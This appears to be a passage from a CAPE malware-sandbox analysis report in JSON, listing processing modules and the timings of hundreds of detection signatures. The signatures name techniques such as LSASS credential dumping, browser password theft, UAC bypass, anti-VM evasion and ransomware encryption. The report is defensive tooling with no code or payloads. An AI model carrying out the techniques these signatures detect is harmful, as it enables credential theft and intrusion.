| { | |
| "statistics": { | |
| "processing": [ | |
| { | |
| "name": "CAPE", | |
| "time": 0.888 | |
| }, | |
| { | |
| "name": "AnalysisInfo", | |
| "time": 0.004 | |
| }, | |
| { | |
| "name": "BehaviorAnalysis", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "Debug", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "NetworkAnalysis", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "Suricata", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "UrlAnalysis", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "script_log_processing", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "ProcessMemory", | |
| "time": 0.0 | |
| } | |
| ], | |
| "signatures": [ | |
| { | |
| "name": "packer_themida", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "stealth_network", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "disable_driver_via_blocklist", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "disable_driver_via_hvcidisallowedimages", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "disable_hypervisor_protected_code_integrity", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "pendingfilerenameoperations_Operations", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "anomalous_deletefile", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antiav_servicestop", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antidebug_guardpages", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antidebug_outputdebugstring", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antidebug_windows", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antisandbox_cuckoocrash", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antisandbox_foregroundwindows", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antisandbox_script_timer", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antisandbox_sleep", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antisandbox_unhook", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antivm_directory_objects", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antivm_generic_system", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antivm_checks_available_memory", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "detect_virtualization_via_recent_files", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antivm_vmware_events", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "api_spamming", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "api_uuidfromstringa", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "bcdedit_command", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "potential_overwrite_mbr", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "suspicious_ioctl_scsipassthough", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "browser_needed", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "uac_bypass_cmstp", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "uac_bypass_eventvwr", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "dotnet_code_compile", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "creates_largekey", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "creates_nullvalue", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "access_windows_passwords_vault", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "lsass_credential_dumping", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "critical_process", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "cryptopool_domains", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "dead_connect", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "dead_link", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "decoy_document", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "decoy_image", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "deletes_consolehost_history", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "dep_bypass", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "dep_disable", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "disables_wfp", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "add_windows_defender_exclusions", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "document_script_exe_drop", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "guloader_apis", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "driver_load", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "dynamic_function_loading", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "encrypted_ioc", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "process_creation_suspicious_location", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "exploit_getbasekerneladdress", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "exploit_gethaldispatchtable", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "exploit_heapspray", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "koadic_apis", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "koadic_network_activity", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "downloads_from_filehosting", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "generic_phish", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "http_request", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "infostealer_browser", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "infostealer_browser_password", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "infostealer_cookies", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "cryptbot_network", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "purplewave_network_activity", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "quilclipper_behavior", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "raccoon_behavior", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "captures_screenshot", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "vidar_behavior", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "injection_network_traffic", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "injection_themeinitapihook", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "resumethread_remote_process", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "internet_dropper", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "escalate_privilege_via_named_pipe", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "ipc_namedpipe", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "js_phish", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "js_suspicious_redirect", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "execute_binary_via_internet_explorer_exporter", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "execute_binary_via_run_exe_helper_utility", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "execute_ps_via_syncappvpublishingserver", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "malicious_dynamic_function_loading", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "encrypt_pcinfo", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "encrypt_data_agenttesla_http", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "encrypt_data_agentteslat2_http", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "encrypt_data_nanocore", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "mimics_filetime", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "amsi_bypass_via_com_registry", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "access_auto_logons_via_registry", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "access_boot_key_via_registry", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "create_suspicious_lnk_files", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "credential_access_via_windows_credential_history", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "dll_hijacking_via_microsoft_exchange", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "dll_hijacking_via_waas_medic_svc_com_typelib", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "execute_file_downloaded_via_openssh", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "execute_safe_mode_from_suspicious_process", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "execute_scripts_via_microsoft_management_console", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "execute_suspicious_processes_via_windows_mssql_service", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "execution_from_self_extracting_archive", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "ip_address_discovery_via_trusted_program", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "load_dll_via_control_panel", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_connection_via_suspicious_process", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "potential_location_discovery_via_unusual_process", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "store_executable_registry", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "Suspicious_Execution_Via_MicrosoftExchangeTransportAgent", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "suspicious_java_execution_via_win_scripts", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "Suspicious_Scheduled_Task_Creation_Via_Masqueraded_XML_File", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "uses_restart_manager_for_suspicious_activities", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "modify_desktop_wallpaper", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "move_file_on_reboot", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "multiple_useragents", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_anomaly", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_bind", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_cnc_https_archive", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_cnc_https_free_webshoting", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_cnc_https_generic", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_cnc_https_temp_urldns", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_cnc_https_opensource", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_cnc_https_pastesite", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_cnc_https_payload", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_cnc_https_serviceinterface", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_cnc_https_socialmedia", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_cnc_https_telegram", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_cnc_https_tempstorage", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_cnc_https_urlshortener", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_cnc_https_useragent", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_cnc_smtps_exfil", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_cnc_smtps_generic", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_dns_idn", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_dns_suspicious_querytype", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_dns_tunneling_request", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_document_http", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "explorer_http", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_fake_useragent", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "legitimate_domain_abuse", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_tor", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "office_cve2017_11882", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "office_cve2017_11882_network", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "office_cve_2021_40444", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "office_cve_2021_40444_m2", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "office_flash_load", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "office_postscript", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "office_suspicious_processes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "office_write_exe", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "persistence_via_autodial_dll_registry", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "persistence_autorun", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "persistence_autorun_tasks", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "persistence_bootexecute", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "persistence_registry_script", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "powershell_network_connection", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "powershell_download", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "powershell_request", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "createtoolhelp32snapshot_module_enumeration", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "enumerates_running_processes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "process_interest", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "process_needed", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "mass_data_encryption", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "ransomware_file_modifications", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "nemty_network_activity", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "nemty_note", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "sodinokibi_behavior", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "stop_ransomware_registry", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "blackrat_apis", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "blackrat_network_activity", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "blackrat_registry_keys", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "dcrat_behavior", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "karagany_system_event_objects", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "rat_luminosity", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "rat_nanocore", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "netwire_behavior", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "obliquerat_network_activity", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "orcusrat_behavior", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "trochilusrat_apis", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "reads_self", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "recon_beacon", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "recon_programs", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "accesses_recyclebin", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "remcos_shell_code_dynamic_wrapper_x", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "script_created_process", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "script_network_activity", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "suspicious_js_script", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "javascript_timer", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "secure_login_phishing", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "securityxploded_modules", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "get_clipboard_data", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "sets_autoconfig_url", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "spoofs_procname", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "stack_pivot", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "stack_pivot_file_created", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "stack_pivot_process_create", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "set_clipboard_data", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "stealth_childproc", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "stealth_file", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "stealth_window", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "queries_keyboard_layout", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "terminates_remote_process", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "user_enum", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "virus", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "neshta_files", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "neshta_regkeys", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "webmail_phish", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "persists_dev_util", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "spawns_dev_util", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "alters_windows_utility", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "overwrites_accessibility_utility", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "Potential_Lateral_Movement_Via_SMBEXEC", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "potential_WebShell_Via_ScreenConnectServer", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "uses_Microsoft_HTML_Help_Executable", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "wiper_zeroedbytes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "wmi_create_process", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "wmi_script_process", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "deletes_files", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "drops_files", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "reads_files", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "writes_files", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antianalysis_tls_section", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antivirus_clamav", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antivirus_virustotal", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "bad_certs", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "bad_ssl_certs", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "banker_zeus_p2p", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "banker_zeus_url", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "binary_yara", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "bot_athenahttp", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "bot_dirtjumper", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "bot_drive", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "bot_drive2", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "bot_madness", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "family_proxyback", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "flare_capa_antianalysis", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "flare_capa_collection", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "flare_capa_communication", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "flare_capa_compiler", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "flare_capa_datamanipulation", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "flare_capa_executable", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "flare_capa_hostinteraction", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "flare_capa_impact", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "flare_capa_lib", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "flare_capa_linking", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "flare_capa_loadcode", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "flare_capa_malwarefamily", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "flare_capa_nursery", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "flare_capa_persistence", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "flare_capa_runtime", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "flare_capa_targeting", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "log4shell", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "mimics_extension", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_country_distribution", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_cnc_http", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_ip_exe", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_dga", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_dga_fraunhofer", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_dyndns", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_excessive_udp", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_http", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_icmp", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_irc", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_open_proxy", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_questionable_http_path", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_questionable_https_path", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_smtp", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "network_torgateway", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "origin_langid", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "origin_resource_langid", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "overlay", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "packer_unknown_pe_section_name", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "packer_aspack", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "packer_aspirecrypt", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "packer_bedsprotector", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "packer_confuser", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "packer_enigma", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "packer_entropy", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "packer_mpress", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "packer_nate", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "packer_nspack", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "packer_smartassembly", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "packer_spices", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "packer_themida", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "packer_titan", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "packer_upx", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "packer_vmprotect", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "packer_yoda", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "pdf_annot_urls_checker", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "polymorphic", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "punch_plus_plus_pcres", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "procmem_yara", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "recon_checkip", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "static_authenticode", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "invalid_authenticode_signature", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "static_dotnet_anomaly", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "static_java", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "static_pdf", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "static_pe_anomaly", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "pe_compile_timestomping", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "static_pe_pdbpath", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "static_rat_config", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "static_versioninfo_anomaly", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "suricata_alert", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "suspicious_html_body", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "suspicious_html_name", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "suspicious_html_title", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "volatility_devicetree_1", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "volatility_handles_1", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "volatility_ldrmodules_1", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "volatility_ldrmodules_2", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "volatility_malfind_1", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "volatility_malfind_2", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "volatility_modscan_1", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "volatility_svcscan_1", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "volatility_svcscan_2", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "volatility_svcscan_3", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "whois_create", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "accesses_mailslot", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "accesses_netlogon_regkey", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "accesses_public_folder", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "accesses_sysvol", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "writes_sysvol", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "adds_admin_user", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "adds_user", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "overwrites_admin_password", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antianalysis_detectfile", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antianalysis_detectreg", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "modify_attachment_manager", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antiav_detectfile", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antiav_detectreg", | |
| "time": 0.001 | |
| }, | |
| { | |
| "name": "antiav_srp", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antiav_whitespace", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antidebug_devices", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antiemu_windefend", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antiemu_wine_reg", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antisandbox_cuckoo_files", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antisandbox_fortinet_files", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antisandbox_joe_anubis_files", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antisandbox_sboxie_mutex", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antisandbox_sunbelt_files", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antisandbox_threattrack_files", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antivm_bochs_keys", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antivm_generic_bios", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antivm_generic_diskreg", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antivm_hyperv_keys", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antivm_parallels_keys", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antivm_vbox_devices", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antivm_vbox_files", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antivm_vbox_keys", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antivm_vmware_devices", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antivm_vmware_files", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antivm_vmware_keys", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antivm_vmware_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antivm_vpc_files", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antivm_vpc_keys", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antivm_vpc_mutex", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "antivm_xen_keys", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "asyncrat_mutex", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "gulpix_behavior", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "ketrican_regkeys", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "okrum_mutexes", | |
| "time": 0.0 | |
| }, | |
| { | |
| "name": "banker_cridex", | |
| "time": 0.0 | |
